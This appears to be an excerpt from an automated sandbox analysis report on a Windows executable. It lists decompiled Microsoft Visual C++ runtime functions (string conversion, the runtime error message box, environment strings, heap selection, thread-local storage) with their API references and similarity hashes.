0x00406aa6
0x00406a8d
0x00406a53
0x004069fc
0x00406a02
0x00406a0e
0x00406a0e
0x00406997
0x00406997
0x00406998
0x0040699b
0x004069b1
0x004069cd
0x00406af5
0x00406af5
0x004069d3
0x004069d3
0x00000000
0x004069d3
0x004069b3
0x004069b3
0x00000000
0x004069b3
0x004069b1
0x00406afd
0x00406b08

APIs

LCMapStringW.KERNEL32(00000000,00000100,00408580,00000001,00000000,00000000,74B070F0,0040D2CC,?,?,?,00406D59,?,?,?,00000000), ref: 004069A9
LCMapStringA.KERNEL32(00000000,00000100,0040857C,00000001,00000000,00000000,?,?,00406D59,?,?,?,00000000,00000001), ref: 004069C5
LCMapStringA.KERNEL32(?,?,?,Ym@,?,?,74B070F0,0040D2CC,?,?,?,00406D59,?,?,?,00000000), ref: 00406A0E
MultiByteToWideChar.KERNEL32(0000000A,00000001,?,Ym@,00000000,00000000,74B070F0,0040D2CC,?,?,?,00406D59,?,?,?,00000000), ref: 00406A46
MultiByteToWideChar.KERNEL32(0000000A,00000001,?,?,00000000,00000000,?,?,00406D59,?,?,?,00000000,00000001), ref: 00406A9E
LCMapStringW.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,00406D59,?,?,?,00000000,00000001), ref: 00406AB4
LCMapStringW.KERNEL32(?,?,00000000,00000000,?,?,?,?,00406D59,?,?,?,00000000,00000001), ref: 00406AE7
LCMapStringW.KERNEL32(?,?,00000000,?,?,00000000,?,?,00406D59,?,?,?,00000000,00000001), ref: 00406B4F

Strings

Ym@, xrefs: 00406A31, 00406A93, 00406A02, 004069E2

Memory Dump Source

Source File: 00000000.00000002.202874069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202870545.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202881099.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202885099.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202889113.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202893852.000000000040E000.00000002.00020000.sdmp Download File

Similarity

API ID: String$ByteCharMultiWide
String ID: Ym@
API String ID: 352835431-983799895
Opcode ID: ef1fee7cd351a263e99fe021380e22bfb6433c57ea9a695f41b5d44ff5ea1ccc
Instruction ID: 8176bab637704051148fc11e8be7c68dcba1f85ecf9eaa0d196e4c066afb4d79
Opcode Fuzzy Hash: ef1fee7cd351a263e99fe021380e22bfb6433c57ea9a695f41b5d44ff5ea1ccc
Instruction Fuzzy Hash: 16517A71900209EBCF219F94CD45A9B7FB8FB49750F11813AF912B22A0D7398D20EB69

Uniqueness

Uniqueness Score: -1.00%

Function 004065BF, Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 50
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E004065BF(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr* _t4;
				intOrPtr* _t7;
				_Unknown_base(*)()* _t11;
				void* _t14;
				struct HINSTANCE__* _t15;
				void* _t17;

				_t14 = 0;
				_t17 =  *0x40d128 - _t14; // 0x0
				if(_t17 != 0) {
					L4:
					_t4 =  *0x40d12c; // 0x0
					if(_t4 != 0) {
						_t14 =  *_t4();
						if(_t14 != 0) {
							_t7 =  *0x40d130; // 0x0
							if(_t7 != 0) {
								_t14 =  *_t7(_t14);
							}
						}
					}
					return  *0x40d128(_t14, _a4, _a8, _a12);
				}
				_t15 = LoadLibraryA("user32.dll");
				if(_t15 == 0) {
					L10:
					return 0;
				}
				_t11 = GetProcAddress(_t15, "MessageBoxA");
				 *0x40d128 = _t11;
				if(_t11 == 0) {
					goto L10;
				} else {
					 *0x40d12c = GetProcAddress(_t15, "GetActiveWindow");
					 *0x40d130 = GetProcAddress(_t15, "GetLastActivePopup");
					goto L4;
				}
			}

0x004065c0
0x004065c2
0x004065ca
0x0040660e
0x0040660e
0x00406615
0x00406619
0x0040661d
0x0040661f
0x00406626
0x0040662b
0x0040662b
0x00406626
0x0040661d
0x00000000
0x0040663a
0x004065d7
0x004065db
0x00406644
0x00000000
0x00406644
0x004065e9
0x004065ed
0x004065f2
0x00000000
0x004065f4
0x00406602
0x00406609
0x00000000
0x00406609

APIs

LoadLibraryA.KERNEL32(user32.dll,?,00000000,00000000,0040406D,?,Microsoft Visual C++ Runtime Library,00012010,?,0040849C,?,004084EC,?,?,?,Runtime Error!Program: ), ref: 004065D1
GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 004065E9
GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 004065FA
GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 00406607

Strings

GetActiveWindow, xrefs: 004065F4
MessageBoxA, xrefs: 004065E3
GetLastActivePopup, xrefs: 004065FC
user32.dll, xrefs: 004065CC

Memory Dump Source

Source File: 00000000.00000002.202874069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202870545.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202881099.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202885099.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202889113.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202893852.000000000040E000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$LibraryLoad
String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll
API String ID: 2238633743-4044615076
Opcode ID: de83a2be77e068634bcef9c668b0e23e5eba04819015b72b58bffe3a3692adde
Instruction ID: 35a4cb16e12441fde5839e4f023c85a4599c8dad3030ff745eaf4ba572c972f4
Opcode Fuzzy Hash: de83a2be77e068634bcef9c668b0e23e5eba04819015b72b58bffe3a3692adde
Instruction Fuzzy Hash: 53014871A007116FD7109FF55E80A2B3AD9EB4C754715083FE681F6290DE7AC8658B5C

Uniqueness

Uniqueness Score: -1.00%

Function 00406BB6, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 117
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E00406BB6(int _a4, char* _a8, int _a12, char _a16, int _a20, int _a24, signed int _a28) {
				int _v8;
				intOrPtr _v20;
				short* _v28;
				short _v32;
				int _v36;
				short* _v40;
				void* _v56;
				int _t31;
				int _t32;
				int _t37;
				int _t43;
				int _t44;
				int _t45;
				void* _t53;
				short* _t60;
				int _t61;
				intOrPtr _t62;
				short* _t63;

				_push(0xffffffff);
				_push(0x4085a0);
				_push(E00403E38);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t62;
				_t63 = _t62 - 0x18;
				_v28 = _t63;
				_t31 =  *0x40d16c; // 0x1
				if(_t31 != 0) {
					L6:
					if(_t31 != 2) {
						if(_t31 != 1) {
							goto L18;
						} else {
							if(_a20 == 0) {
								_t44 =  *0x40d160; // 0x0
								_a20 = _t44;
							}
							asm("sbb eax, eax");
							_t37 = MultiByteToWideChar(_a20, ( ~_a28 & 0x00000008) + 1, _a8, _a12, 0, 0);
							_v36 = _t37;
							if(_t37 == 0) {
								goto L18;
							} else {
								_v8 = 0;
								E00406590(_t37 + _t37 + 0x00000003 & 0x000000fc, _t53);
								_v28 = _t63;
								_t60 = _t63;
								_v40 = _t60;
								E00406750(_t60, 0, _t37 + _t37);
								_v8 = _v8 | 0xffffffff;
								if(_t60 == 0) {
									goto L18;
								} else {
									_t43 = MultiByteToWideChar(_a20, 1, _a8, _a12, _t60, _v36);
									if(_t43 == 0) {
										goto L18;
									} else {
										_t26 =  &_a16; // 0x406d59
										_t32 = GetStringTypeW(_a4, _t60, _t43,  *_t26);
									}
								}
							}
						}
					} else {
						_t45 = _a24;
						if(_t45 == 0) {
							_t45 =  *0x40d150; // 0x0
						}
						_t5 =  &_a16; // 0x406d59
						_t32 = GetStringTypeA(_t45, _a4, _a8, _a12,  *_t5);
					}
				} else {
					_push( &_v32);
					_t61 = 1;
					if(GetStringTypeW(_t61, 0x408580, _t61, ??) == 0) {
						if(GetStringTypeA(0, _t61, 0x40857c, _t61,  &_v32) == 0) {
							L18:
							_t32 = 0;
						} else {
							_t31 = 2;
							goto L5;
						}
					} else {
						_t31 = _t61;
						L5:
						 *0x40d16c = _t31;
						goto L6;
					}
				}
				 *[fs:0x0] = _v20;
				return _t32;
			}

0x00406bb9
0x00406bbb
0x00406bc0
0x00406bcb
0x00406bcc
0x00406bd3
0x00406bd9
0x00406bdc
0x00406be5
0x00406c25
0x00406c28
0x00406c51
0x00000000
0x00406c57
0x00406c5a
0x00406c5c
0x00406c61
0x00406c61
0x00406c71
0x00406c7b
0x00406c81
0x00406c86
0x00000000
0x00406c88
0x00406c88
0x00406c95
0x00406c9a
0x00406c9d
0x00406c9f
0x00406ca5
0x00406cba
0x00406cc0
0x00000000
0x00406cc2
0x00406cd1
0x00406cd9
0x00000000
0x00406cdb
0x00406cdb
0x00406ce3
0x00406ce3
0x00406cd9
0x00406cc0
0x00406c86
0x00406c2a
0x00406c2a
0x00406c2f
0x00406c31
0x00406c31
0x00406c36
0x00406c43
0x00406c43
0x00406be7
0x00406bea
0x00406bed
0x00406bfd
0x00406c17
0x00406ceb
0x00406ceb
0x00406c1d
0x00406c1f
0x00000000
0x00406c1f
0x00406bff
0x00406bff
0x00406c20
0x00406c20
0x00000000
0x00406c20
0x00406bfd
0x00406cf3
0x00406cfe

APIs

GetStringTypeW.KERNEL32(00000001,00408580,00000001,?,74B070F0,0040D2CC,?,?,00406D59,?,?,?,00000000,00000001), ref: 00406BF5
GetStringTypeA.KERNEL32(00000000,00000001,0040857C,00000001,?,?,00406D59,?,?,?,00000000,00000001), ref: 00406C0F
GetStringTypeA.KERNEL32(?,?,?,?,Ym@,74B070F0,0040D2CC,?,?,00406D59,?,?,?,00000000,00000001), ref: 00406C43
MultiByteToWideChar.KERNEL32(?,0040D2CD,?,?,00000000,00000000,74B070F0,0040D2CC,?,?,00406D59,?,?,?,00000000,00000001), ref: 00406C7B
MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,?,?,?,?,?,00406D59,?), ref: 00406CD1
GetStringTypeW.KERNEL32(?,?,00000000,Ym@,?,?,?,?,?,?,00406D59,?), ref: 00406CE3

Strings

Ym@, xrefs: 00406CDB, 00406C36

Memory Dump Source

Source File: 00000000.00000002.202874069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202870545.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202881099.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202885099.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202889113.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202893852.000000000040E000.00000002.00020000.sdmp Download File

Similarity

API ID: StringType$ByteCharMultiWide
String ID: Ym@
API String ID: 3852931651-983799895
Opcode ID: 19edb6d76af0899a1d615053b388bc96e37f978f5937c59ba0655f7f61e4d907
Instruction ID: 0c826d932dab6a2b35537ad75a382305a03d7104addcdec2b18846f1db506b26
Opcode Fuzzy Hash: 19edb6d76af0899a1d615053b388bc96e37f978f5937c59ba0655f7f61e4d907
Instruction Fuzzy Hash: 5A418F71904209AFDF209F94CE85AAB7F79FB08750F11443AF942F6290C7388924CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00403F49, Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 100
fileCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00403F49(void* __edi, long _a4) {
				char _v164;
				char _v424;
				int _t17;
				long _t19;
				signed int _t42;
				long _t47;
				void* _t48;
				signed int _t54;
				void** _t56;
				void* _t57;

				_t48 = __edi;
				_t47 = _a4;
				_t42 = 0;
				_t17 = 0x40a1b8;
				while(_t47 !=  *_t17) {
					_t17 = _t17 + 8;
					_t42 = _t42 + 1;
					if(_t17 < 0x40a248) {
						continue;
					}
					break;
				}
				_t54 = _t42 << 3;
				_t2 = _t54 + 0x40a1b8; // 0x9c000000
				if(_t47 ==  *_t2) {
					_t17 =  *0x40cf5c; // 0x0
					if(_t17 == 1 || _t17 == 0 &&  *0x40a0ec == 1) {
						_t16 = _t54 + 0x40a1bc; // 0x40849c
						_t56 = _t16;
						_t19 = E00405A30( *_t56);
						_t17 = WriteFile(GetStdHandle(0xfffffff4),  *_t56, _t19,  &_a4, 0);
					} else {
						if(_t47 != 0xfc) {
							if(GetModuleFileNameA(0,  &_v424, 0x104) == 0) {
								E00405940( &_v424, "<program name unknown>");
							}
							_push(_t48);
							_t49 =  &_v424;
							if(E00405A30( &_v424) + 1 > 0x3c) {
								_t49 = E00405A30( &_v424) +  &_v424 - 0x3b;
								E00406650(E00405A30( &_v424) +  &_v424 - 0x3b, "...", 3);
								_t57 = _t57 + 0x10;
							}
							E00405940( &_v164, "Runtime Error!\n\nProgram: ");
							E00405950( &_v164, _t49);
							E00405950( &_v164, "\n\n");
							_t12 = _t54 + 0x40a1bc; // 0x40849c
							E00405950( &_v164,  *_t12);
							_t17 = E004065BF( &_v164, "Microsoft Visual C++ Runtime Library", 0x12010);
						}
					}
				}
				return _t17;
			}

0x00403f49
0x00403f52
0x00403f55
0x00403f57
0x00403f5c
0x00403f60
0x00403f63
0x00403f69
0x00000000
0x00000000
0x00000000
0x00403f69
0x00403f6e
0x00403f71
0x00403f77
0x00403f7d
0x00403f85
0x00404076
0x00404076
0x00404081
0x00404093
0x00403f9c
0x00403fa2
0x00403fbe
0x00403fcc
0x00403fd2
0x00403fd9
0x00403fdb
0x00403feb
0x00404006
0x0040400e
0x00404013
0x00404013
0x00404022
0x0040402f
0x00404040
0x00404045
0x00404052
0x00404068
0x00404070
0x00403fa2
0x00403f85
0x0040409b

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,?), ref: 00403FB6
GetStdHandle.KERNEL32(000000F4,0040849C,00000000,00000000,00000000,?), ref: 0040408C
WriteFile.KERNEL32(00000000), ref: 00404093

Strings

..., xrefs: 00404008
Microsoft Visual C++ Runtime Library, xrefs: 00404062
<program name unknown>, xrefs: 00403FC6
Runtime Error!Program: , xrefs: 0040401C

Memory Dump Source

Source File: 00000000.00000002.202874069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202870545.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202881099.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202885099.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202889113.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202893852.000000000040E000.00000002.00020000.sdmp Download File

Similarity

API ID: File$HandleModuleNameWrite
String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
API String ID: 3784150691-4022980321
Opcode ID: f4d49badb77c75cacfad7ea4599639127be344c80b5209b02cb9855a447d923b
Instruction ID: 6e217ef30637fb527e41127d46efc14c3263da1eec37f3ca93dc6c0e739c8d79
Opcode Fuzzy Hash: f4d49badb77c75cacfad7ea4599639127be344c80b5209b02cb9855a447d923b
Instruction Fuzzy Hash: E631D6B2A00209AFDF20EA60CD49F9B376CEB85304F54057FF645F61C1E6789A548E5E

Uniqueness

Uniqueness Score: -1.00%

Function 0040396F, Relevance: 12.1, APIs: 8, Instructions: 132
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040396F() {
				int _v4;
				int _v8;
				intOrPtr _t7;
				CHAR* _t9;
				WCHAR* _t17;
				int _t20;
				char* _t24;
				int _t32;
				CHAR* _t36;
				WCHAR* _t38;
				void* _t39;
				int _t42;

				_t7 =  *0x40d0a8; // 0x1
				_t32 = 0;
				_t38 = 0;
				_t36 = 0;
				if(_t7 != 0) {
					if(_t7 != 1) {
						if(_t7 != 2) {
							L27:
							return 0;
						}
						L18:
						if(_t36 != _t32) {
							L20:
							_t9 = _t36;
							if( *_t36 == _t32) {
								L23:
								_t41 = _t9 - _t36 + 1;
								_t39 = E004028A0(_t9 - _t36 + 1);
								if(_t39 != _t32) {
									E00405EA0(_t39, _t36, _t41);
								} else {
									_t39 = 0;
								}
								FreeEnvironmentStringsA(_t36);
								return _t39;
							} else {
								goto L21;
							}
							do {
								do {
									L21:
									_t9 =  &(_t9[1]);
								} while ( *_t9 != _t32);
								_t9 =  &(_t9[1]);
							} while ( *_t9 != _t32);
							goto L23;
						}
						_t36 = GetEnvironmentStrings();
						if(_t36 == _t32) {
							goto L27;
						}
						goto L20;
					}
					L6:
					if(_t38 != _t32) {
						L8:
						_t17 = _t38;
						if( *_t38 == _t32) {
							L11:
							_t20 = (_t17 - _t38 >> 1) + 1;
							_v4 = _t20;
							_t42 = WideCharToMultiByte(_t32, _t32, _t38, _t20, _t32, _t32, _t32, _t32);
							if(_t42 != _t32) {
								_t24 = E004028A0(_t42);
								_v8 = _t24;
								if(_t24 != _t32) {
									if(WideCharToMultiByte(_t32, _t32, _t38, _v4, _t24, _t42, _t32, _t32) == 0) {
										E004027B7(_v8);
										_v8 = _t32;
									}
									_t32 = _v8;
								}
							}
							FreeEnvironmentStringsW(_t38);
							return _t32;
						} else {
							goto L9;
						}
						do {
							do {
								L9:
								_t17 =  &(_t17[1]);
							} while ( *_t17 != _t32);
							_t17 =  &(_t17[1]);
						} while ( *_t17 != _t32);
						goto L11;
					}
					_t38 = GetEnvironmentStringsW();
					if(_t38 == _t32) {
						goto L27;
					}
					goto L8;
				}
				_t38 = GetEnvironmentStringsW();
				if(_t38 == 0) {
					_t36 = GetEnvironmentStrings();
					if(_t36 == 0) {
						goto L27;
					}
					 *0x40d0a8 = 2;
					goto L18;
				}
				 *0x40d0a8 = 1;
				goto L6;
			}

0x00403971
0x00403980
0x00403982
0x00403984
0x00403988
0x004039c0
0x00403a4a
0x00403a98
0x00000000
0x00403a98
0x00403a4c
0x00403a4e
0x00403a5c
0x00403a5e
0x00403a60
0x00403a6c
0x00403a6f
0x00403a77
0x00403a7c
0x00403a85
0x00403a7e
0x00403a7e
0x00403a7e
0x00403a8e
0x00000000
0x00000000
0x00000000
0x00000000
0x00403a62
0x00403a62
0x00403a62
0x00403a62
0x00403a63
0x00403a67
0x00403a68
0x00000000
0x00403a62
0x00403a56
0x00403a5a
0x00000000
0x00000000
0x00000000
0x00403a5a
0x004039c6
0x004039c8
0x004039d6
0x004039d9
0x004039db
0x004039eb
0x004039f7
0x004039fe
0x00403a04
0x00403a08
0x00403a0b
0x00403a13
0x00403a17
0x00403a28
0x00403a2e
0x00403a34
0x00403a34
0x00403a38
0x00403a38
0x00403a17
0x00403a3d
0x00000000
0x00000000
0x00000000
0x00000000
0x004039dd
0x004039dd
0x004039dd
0x004039de
0x004039df
0x004039e5
0x004039e6
0x00000000
0x004039dd
0x004039cc
0x004039d0
0x00000000
0x00000000
0x00000000
0x004039d0
0x0040398c
0x00403990
0x004039a4
0x004039a8
0x00000000
0x00000000
0x004039ae
0x00000000
0x004039ae
0x00403992
0x00000000

APIs

GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,00402713), ref: 0040398A
GetEnvironmentStrings.KERNEL32(?,?,?,?,?,?,00402713), ref: 0040399E
GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,00402713), ref: 004039CA
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,?,?,?,?,?,00402713), ref: 00403A02
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,?,?,?,00402713), ref: 00403A24
FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,?,00402713), ref: 00403A3D
GetEnvironmentStrings.KERNEL32(?,?,?,?,?,?,00402713), ref: 00403A50
FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00403A8E

Memory Dump Source

Source File: 00000000.00000002.202874069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202870545.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202881099.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202885099.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202889113.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202893852.000000000040E000.00000002.00020000.sdmp Download File

Similarity

API ID: EnvironmentStrings$ByteCharFreeMultiWide
String ID:
API String ID: 1823725401-0
Opcode ID: 3341c1a57459a73859af4784913d8ac99d631b977b33b036abde2fc917227607
Instruction ID: f460362602db22cf29a542334e4414209dd7254ade1229447c787021adc6b272
Opcode Fuzzy Hash: 3341c1a57459a73859af4784913d8ac99d631b977b33b036abde2fc917227607
Instruction Fuzzy Hash: A53146B26042116FD7207FB85D8883B7E9CEA4531A715053FF5C6F3280EA798E458B6D

Uniqueness

Uniqueness Score: -1.00%

Function 00403C8A, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 115
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E00403C8A(void* __ecx, void* __eflags) {
				char _v8;
				struct _OSVERSIONINFOA _v156;
				char _v416;
				char _v4656;
				void* _t24;
				CHAR* _t32;
				void* _t33;
				intOrPtr* _t34;
				void* _t35;
				char _t36;
				char _t38;
				void* _t40;
				char* _t44;
				char* _t45;
				char* _t50;

				E00406590(0x122c, __ecx);
				_v156.dwOSVersionInfoSize = 0x94;
				if(GetVersionExA( &_v156) != 0 && _v156.dwPlatformId == 2 && _v156.dwMajorVersion >= 5) {
					_t40 = 1;
					return _t40;
				}
				if(GetEnvironmentVariableA("__MSVCRT_HEAP_SELECT",  &_v4656, 0x1090) == 0) {
					L28:
					_t24 = E00403C5D( &_v8);
					asm("sbb eax, eax");
					return _t24 + 3;
				}
				_t44 =  &_v4656;
				if(_v4656 != 0) {
					do {
						_t38 =  *_t44;
						if(_t38 >= 0x61 && _t38 <= 0x7a) {
							 *_t44 = _t38 - 0x20;
						}
						_t44 = _t44 + 1;
					} while ( *_t44 != 0);
				}
				if(E00406550("__GLOBAL_HEAP_SELECTED",  &_v4656, 0x16) != 0) {
					GetModuleFileNameA(0,  &_v416, 0x104);
					_t45 =  &_v416;
					if(_v416 != 0) {
						do {
							_t36 =  *_t45;
							if(_t36 >= 0x61 && _t36 <= 0x7a) {
								 *_t45 = _t36 - 0x20;
							}
							_t45 = _t45 + 1;
						} while ( *_t45 != 0);
					}
					_t32 = E004064D0( &_v4656,  &_v416);
				} else {
					_t32 =  &_v4656;
				}
				if(_t32 == 0) {
					goto L28;
				}
				_t33 = E00406410(_t32, 0x2c);
				if(_t33 == 0) {
					goto L28;
				}
				_t34 = _t33 + 1;
				_t50 = _t34;
				if( *_t34 != 0) {
					do {
						if( *_t50 != 0x3b) {
							_t50 = _t50 + 1;
						} else {
							 *_t50 = 0;
						}
					} while ( *_t50 != 0);
				}
				_t35 = E004061D5(_t34, 0, 0xa);
				if(_t35 != 2 && _t35 != 3 && _t35 != 1) {
					goto L28;
				}
				return _t35;
			}

0x00403c92
0x00403c9f
0x00403cb1
0x00403cc7
0x00000000
0x00403cc7
0x00403ce6
0x00403dbc
0x00403dc0
0x00403dca
0x00000000
0x00403dcc
0x00403cee
0x00403cfa
0x00403cfc
0x00403cfc
0x00403d00
0x00403d08
0x00403d08
0x00403d0a
0x00403d0b
0x00403cfc
0x00403d27
0x00403d3e
0x00403d4a
0x00403d50
0x00403d52
0x00403d52
0x00403d56
0x00403d5e
0x00403d5e
0x00403d60
0x00403d61
0x00403d52
0x00403d73
0x00403d29
0x00403d29
0x00403d29
0x00403d7c
0x00000000
0x00000000
0x00403d81
0x00403d8a
0x00000000
0x00000000
0x00403d8c
0x00403d8d
0x00403d91
0x00403d93
0x00403d96
0x00403d9c
0x00403d98
0x00403d98
0x00403d98
0x00403d9d
0x00403d93
0x00403da5
0x00403db0
0x00000000
0x00000000
0x00403dd1

APIs

GetVersionExA.KERNEL32 ref: 00403CA9
GetEnvironmentVariableA.KERNEL32(__MSVCRT_HEAP_SELECT,?,00001090), ref: 00403CDE
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00403D3E

Strings

__GLOBAL_HEAP_SELECTED, xrefs: 00403D18
__MSVCRT_HEAP_SELECT, xrefs: 00403CD9

Memory Dump Source

Source File: 00000000.00000002.202874069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202870545.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202881099.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202885099.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202889113.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202893852.000000000040E000.00000002.00020000.sdmp Download File

Similarity

API ID: EnvironmentFileModuleNameVariableVersion
String ID: __GLOBAL_HEAP_SELECTED$__MSVCRT_HEAP_SELECT
API String ID: 1385375860-4131005785
Opcode ID: db2cf84cef6e4ca526c92d22917466c07231cabb2b10c38645a922e115710fe6
Instruction ID: 55c59d92e378af30fba6bc2bd7e960bf012ff3464936cafb4907c14ccb8b8aff
Opcode Fuzzy Hash: db2cf84cef6e4ca526c92d22917466c07231cabb2b10c38645a922e115710fe6
Instruction Fuzzy Hash: F331C6729252486AEB319B746C457DA3F6D9F02705F2404FBD185F62C2E6388F898B19

Uniqueness

Uniqueness Score: -1.00%

Function 004076E0, Relevance: 7.5, APIs: 5, Instructions: 45
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E004076E0(void* __ecx, CHAR* _a4) {
				void* _v12;
				int _t11;
				signed int _t13;
				void* _t16;
				short* _t17;
				int _t19;
				short* _t21;

				_t16 = __ecx;
				if(_a4 != 0) {
					_t19 = lstrlenA(_a4) + 1;
					E00406590(_t19 + _t19 + 0x00000003 & 0x000000fc, _t16);
					_t17 = _t21;
					 *_t17 =  *_t17 & 0x00000000;
					_t11 = MultiByteToWideChar(0, 0, _a4, 0xffffffff, _t17, _t19);
					if(_t11 == 0) {
						if(GetLastError() == 0) {
							_t13 = 0;
						} else {
							_t13 = GetLastError() & 0x0000ffff | 0x80070000;
						}
						_t11 = E00407633(_t13);
					}
					__imp__#2(_t17);
				} else {
					_t11 = 0;
				}
				return _t11;
			}

0x004076e0
0x004076e9
0x004076fa
0x00407703
0x00407708
0x00407711
0x00407719
0x00407721
0x0040772d
0x0040773d
0x0040772f
0x00407736
0x00407736
0x00407740
0x00407740
0x00407746
0x004076eb
0x004076eb
0x004076eb
0x00407752

APIs

lstrlenA.KERNEL32(00000000,?,00000000,?,00401AD9,?), ref: 004076F2
MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000001,?,00401AD9,?), ref: 00407719
GetLastError.KERNEL32(?,00000001,?,00401AD9,?), ref: 00407729
GetLastError.KERNEL32(?,00000001,?,00401AD9,?), ref: 0040772F
SysAllocString.OLEAUT32 ref: 00407746

Memory Dump Source

Source File: 00000000.00000002.202874069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202870545.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202881099.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202885099.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202889113.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202893852.000000000040E000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$AllocByteCharMultiStringWidelstrlen
String ID:
API String ID: 4196186757-0
Opcode ID: 14b5ab40ad701a1db41f0c62696fd2f68177238879e5b48fb871eb66ca77113b
Instruction ID: 465f2ade59e499a35ae17807cde62dad826a670bf9900979c7f86515a37c42d8
Opcode Fuzzy Hash: 14b5ab40ad701a1db41f0c62696fd2f68177238879e5b48fb871eb66ca77113b
Instruction Fuzzy Hash: 0C01F432944515A7CB201B21DD05BAB3FA8EF413A0F20043AF945F61D0EB38B52586FE

Uniqueness

Uniqueness Score: -1.00%

Function 004032B3, Relevance: 7.5, APIs: 5, Instructions: 38
threadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004032B3() {
				void _t10;
				long _t15;
				void* _t16;

				_t15 = GetLastError();
				_t16 = TlsGetValue( *0x40a100);
				if(_t16 == 0) {
					_t16 = E004057E5(1, 0x74);
					if(_t16 == 0 || TlsSetValue( *0x40a100, _t16) == 0) {
						E0040276E(0x10);
					} else {
						E004032A0(_t16);
						_t10 = GetCurrentThreadId();
						 *(_t16 + 4) =  *(_t16 + 4) | 0xffffffff;
						 *_t16 = _t10;
					}
				}
				SetLastError(_t15);
				return _t16;
			}

0x004032c1
0x004032c9
0x004032cd
0x004032d8
0x004032de
0x00403308
0x004032f1
0x004032f2
0x004032f8
0x004032fe
0x00403302
0x00403302
0x004032de
0x0040330f
0x00403319

APIs

GetLastError.KERNEL32(00000103,7FFFFFFF,00406D04,004063A3,00000000,?,?,00000000,00000001), ref: 004032B5
TlsGetValue.KERNEL32(?,?,00000000,00000001), ref: 004032C3
SetLastError.KERNEL32(00000000,?,?,00000000,00000001), ref: 0040330F

Part of subcall function 004057E5: HeapAlloc.KERNEL32(00000008,?,00000000,00000000,00000001,004032D8,00000001,00000074,?,?,00000000,00000001), ref: 004058DB

TlsSetValue.KERNEL32(00000000,?,?,00000000,00000001), ref: 004032E7
GetCurrentThreadId.KERNEL32 ref: 004032F8

Memory Dump Source

Source File: 00000000.00000002.202874069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202870545.0000000000400000.00000002.00020000.sdmp Download File
